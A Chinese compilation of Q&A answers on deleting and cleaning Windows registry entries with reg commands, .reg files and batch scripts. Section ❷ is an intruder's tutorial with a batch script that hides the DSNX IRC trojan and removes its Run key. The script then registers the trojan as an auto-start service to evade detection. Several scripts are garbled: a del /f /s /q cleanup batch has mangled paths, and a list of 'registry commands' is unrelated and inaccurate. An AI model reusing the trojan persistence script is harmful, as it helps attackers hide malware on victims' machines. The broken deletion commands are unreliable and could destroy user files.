清理注册表命令

❶ 如何使用注册表或cmd命令删除注册表中的某一项

reg delete keyname [/v valuename | /ve | /va] [ /f]

其中：
/f：表示不提示，强行删除
/va：表示删除该项下的所有值

/v：表示该项下要删除的值的名称，如果省略，该项下的所有子项和值都会被删除
/ve：不是很理解，跳过

如果上面后三个参数都省略，则删除该项下所有。

keyname：含有空格，应用双引号括住。

❷ 如何利用批处理命令删除注册表

如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)

关于注册表的操作，常见的是创建、修改、删除。

1.创建

创建分为两种，一种是创建子项(Subkey)

我们创建一个文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。

另一种是创建一个项目名称

那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"

"Door"=C:\\WINNT\\system32\\door.exe

"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下

新建了:Invader、door、about这三个项目

Invader的类型是“String Value”

door的类型是“REG SZ Value”

Autodos的类型是“DWORD Value”
2.修改

修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。

3.删除

我们首先来说说删除一个项目名称，我们创建一个如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Ex4rch"=-

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了；

我们再看看删除一个子项，我们创建一个如下的脚本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

执行该脚本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。
相信看到这里，.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了，记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。
samlpe1:如上面的那个例子,如想生成如下注册表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Invader"="Ex4rch"

"door"=hex:255

"Autodos"=dword:000000128

只需要这样：

@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg

@echo "Invader"="Ex4rch">>Sample.reg

@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg

@echo "Autodos"=dword:02>>Sample.reg

samlpe2:

我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)

@start windrv32.exe

@attrib +h +r windrv32.exe

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll

@echo "windsnx "=- >>patch.dll

@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe

@regedit /s patch.dll

@delete patch.dll

@REM [删除DSNXDE在注册表中的启动项，用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读，并config为自启动]

❸ 如何删除注册表中的命令

在360里好删，直接在注册表里不好找……因为这个模块可能是某个程序调用的，而这个程序不知道是什么……

❹ 如何用批处理命令删除注册表键值

用REG命令就可以做到（需要管理员权限）

用法

REG delete " manager" /v PendingFileRenameOperations

如下图

❺ 怎么用命令行删除注册表项

运行 CMD
reg add 增加
reg delete 删除

可以 你打 reg /? 来查询用法

也可以打 reg add /? 来查询分项目用法

------------
举例：

假如我要清除WinRAR的历史记录，可以新建个批处理文件（一行一行敲命令也行），
然后在里面加入如下文字:
reg delete HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath /va /f
reg delete HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ArcName /va /f
reg delete HKEY_CURRENT_USER\Software\WinRAR\ArcHistory /va /f

其中/va参数是指删除该分支下的所有键值,/f参数是指不要跳出提示。
-------------------------------------------------------------------------------------
如果想删除整个分支，就不要加/va，
例如：reg delete HKEY_CURRENT_USER\Software\CrocWare
-------------------------------------------------------------------------------------
如果想删除某个键值，就用 reg delete (分支) /v (键值)
例如:
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify /v PastIconsStream /f
-------------------------------------------------------------------------------------
要注意：
如果注册表中有空格，应用双引号括住注册表；
如果注册表中有%，就用%%来表示；
例如：要清除Alcohol 120%的历史记录，可以在批处理中加入如下命令：

reg delete "HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%%\Basic" /v "Image File Path" /f
reg delete "HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%%\MountedMRU" /f

❻ 如何清理注册表 注册表清理的三种方式

清理注册表删除多余的DLL等文件
对共享软件感兴趣的朋友可能都知道着名的DLL文件清理工具CleanSweep。它的作用，就是将我们长期在系统中添加、删除程序时，在System目录下留下来的大量无用的DLL文件删除，从而提高系统的工作效率，减少硬盘空间的损失。通过注册表，我们也能发现一些无用的DLL文件信息或是VxD文件信息等并将其删除，从而提高系统的运行效率：在注册表中依次打开“HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\ShareDLLs”，此子键下包含的项目即是应用程序安装完毕后向注册表中写入的DLL文件共享信息，每个DLL文件的键值表明了共享此DLL文件的应用程序数目（在卸载这些应用程序时，卸载程序会给出类似“xxx文件被其他文件共享，是否确定删除”的提示），如果某个DLL文件所对应的数值为0，即表示此DLL文件对系统已没有用处，我们可以直接将其删除。对于其他类型的文件，只要其值为0，我们就可以判断其已没有用处，应当予以删除。
此外，在此子键下，你可能会发现以前删除的许多文件包括文件夹（在硬盘上已不存在）下包含的众多文件，它们的值不一定为0，但你一样可以完全将其删除。
重建作清理
我们知道，通过注册表可以将“添加、删除程序”中的各种无法删除的卸载程序信息删除，那么你有没有想过，你在大量增删各种应用程序和硬件设备驱动程序的同时，不可避免地要向注册表中写入数据。时间长了，这些废弃的数据会越来越多，你的注册表文件也越来越臃肿，不仅使你的“酒吧”因为负担越来越重而速度越来越慢，还会经常导致“酒吧”莫名其妙地罢工或提示出错。
现在，我们就动手来将这些无用的信息删除，方法是重建注册表。首先打开注册表编辑器，在注册表编辑器中单击“文件”菜单下的“导出”命令，将现有完整包含各种软件、硬件资源的注册表导出并为其命名，如命名为dc1.reg（因为要在DOS下执行重建注册表工作，因此最好不要起中文名称）。
然后重新启动计算机进入DOS状态（不能用Windows 98 中的DOS模式，重建注册表时Windows 98 不能运行），然后执行下述命令；
regedit/c dc1.reg（c与文件名之间应留一空格）
regedit/c表示从后面指定的文件中重新生成整个注册表。完成后再启动计算机进入Windows 98 ，你会发现重建的注册表文件比原来小了很多（视Windows 98安装后安装和卸载程序的多少而定）。这样经过“减肥”会使Windows 98的运行效率得到提高。
不过需要注意的是，用这种方法重建注册表时一定要注意的DOS的版本，一般计算机只安装了Windows 98的没什么问题，如果计算机同时安装了多个操作系统，进行此项操作最好在DOS 7.0下进行，至少也应在DOS 6.22下进行。Windows 98重建注册表需要很长的时间，以本人计算机为例，赛扬300A，升技BH6主板，64M PC100内存，昆腾火球7代6.4G硬盘，导出的注册表大小为5.86M，重建注册表约耗费了1小时，所以朋友们在进行这项操作前，最好能先加载磁盘高速缓存程序Smartdrv以便加快处理速度，同时在重建注册表前应先将原有的注册表进行完整备份，以免发生不必要的问题。
清理注册表中的软件信息垃圾
虽然现在绝大多数基于Windows 98 的软件都自带了卸载程序或是为Windows 98的“添加/删除程序”提供了卸载信息，但它们并不自觉地在退出历史舞台时将自身删的干干净净，大多数在卸载时并不会将注册表中的相关信息文件（这些信息主要是软件在初始安装时写到注册表中的有关生产商、ID号、用户名等）删除，导致注册表越来越庞大，无用的软件信息垃圾越来越多。我们可以在注册表中用手工方式删除这些无用的信息：
在注册表中依次打开“HEKY－CURRENT－USER\software”，它的下面包含的主键一般以软件生产商命名，如微软件出品的一系列软件都包含在“Microsoft”主键项中。如果确信某些软件已被删除，就可以将其键值全部删除

❼ 运行中清理注册表的命令是什么

注册表是连接操作系统、硬件及驱动程序的数据库，注册表中的垃圾多了，运行速度也会受到影响。“注册表清理工具”是一款专门用于清理注册表中垃圾的软件。 在菜单中单击“扫描”按钮，弹出“注册表扫描”窗口，勾选需要扫描的项目后单击“下一步”即开始扫描，扫描完成后，各类有关注册表的错误信息会在列表中显示，单击“删除”即可删除这些无用的错误信息。 提醒： 为保险起见，删除前可以先单击“备份”，以防删除有误后“还原”之需 。

❽ 清除注册表的命令是什么

什么是注册表
注册表是 Windows 中的数据库，它包含有关计算机上的系统硬件、安装的程序和设置以及每个用户帐户的配置文件的重要信息。Windows 会频繁地参考注册表中的信息。
不需要对注册表进行手动更改， 因为通常情况下程序和应用程序会自动进行所有必要的更改。对计算机的注册表更改不正确可能 会使您的计算机无法操作。但是，如果损坏的文件出现在注册表中，则可能需要您进行更改。
强烈建议您在进行任何更改之前备份注册表，并且只能更改注册表中您理解的值或者由您信任的提供者指导进行更改。

注册表怎么打开
1、最简单的方法，依次打开：“开始”菜单--运行(或者快捷键win + R)-在运行中输入“regedit”再按确定就可以了(不包括双引号)。
2、另外一种方法：在Windows目录下找到regedit.exe，直接双击打开(我们默认C盘为系统盘，依次打开C盘-Windows-regedit.exe)

注册表命令
1. Nslookup-------IP地址侦测器
2. explorer-------打开资源管理器
3. logoff---------注销命令
4. rononce -p ----15秒关机
5. tsshutdn-------60秒倒计时关机命令

注册表清理 删除多余的DLL文件：
DLL文件即动态数据链接库，在安装和卸载软件时，在C:WINDOWSSYSTEM32目录下会留有一些DLL垃圾文件，这些文件会占用很多磁盘空间，从而降低系统运行速度。那么我们怎么判断它是有用的DLL文件还是垃圾呢?删除垃圾DLL文件方法如下：
打开注册表编辑器。
展开HKEY_LOCAL_子键;
该子键下的项目即是应用程序安装完毕后向注册表中添加的共享DLL信息，每个DLL文件的键值都表明了共享该DLL文件的应用程序数目(即图中最右侧括号中的那个数字)。在卸载这些应用程序时，就会弹出提示框“XX文件被其他文件共享，是否确定删除”。这里，如果某个DLL文件对应的数值为0，即表示已经没有程序应用这个DLL文件了，这就是垃圾DLL文件了，直接将它删除即可

清理注册表垃圾的cmd命令是什么
1:在桌面上点右键.
2:新建文本文档.
3:把以下代码复制进去
@echo off
echo 正在清除系统垃圾文件，请稍等......
del /f /s /q %systemdrive%*.tmp
del /f /s /q %systemdrive%*._mp
del /f /s /q %systemdrive%*.log
del /f /s /q %systemdrive%*.gid
del /f /s /q %systemdrive%*.chk
del /f /s /q %systemdrive%*.old
del /f /s /q %systemdrive% ecycled*.*
del /f /s /q %windir%*.bak
del /f /s /q %windir%prefetch*.*
del /s /q /q %windir% emp*.*
del /f /q %userprofile%cookies*.*
del /f /q %userprofile% ecent*.*
del /f /s /q "%userprofile%Local SettingsTemporary Internet Files*.*"
del /f /s /q "%userprofile%Local SettingsTemp*.*"
del /f /s /q "%userprofile% ecent*.*"
echo 清除系统LJ完成！
4：输入另存为 取名为 1.bat
5: 双击运行1.bat

清除注册表垃圾的其他两种方法
1、使用第三方安全软件清理注册表垃圾
利用超级兔子、优化大师、安全卫士一系列的第三方软件清理，下面小编就以金山卫士为例，打开主界面，找到垃圾清理-清理注册表，开始扫描清理即可，金山卫士会自动把注册表备份，就不用我们在单独备份了，要是出了问题也容易恢复。
2、利用自带的注册表编辑其清理
我们首先使用window键+R键调出运行框，然后输入regedit回车，打开注册表编辑器，然后我们就可以把那些不需要的注册表手动清理出门了！这个需要对电脑需要一定的了解，误删注册表可能导致各种系统问题，小白朋友要慎用哦。

❾ 如何用CMD命令 清理注册表

使用小工具清理吧。简单快捷，又可以备份已删除的注册表信息。
免费的注册表整理工具Registry Defrag 2010不错。
http://www.x-berry.com/registry-defrag-2010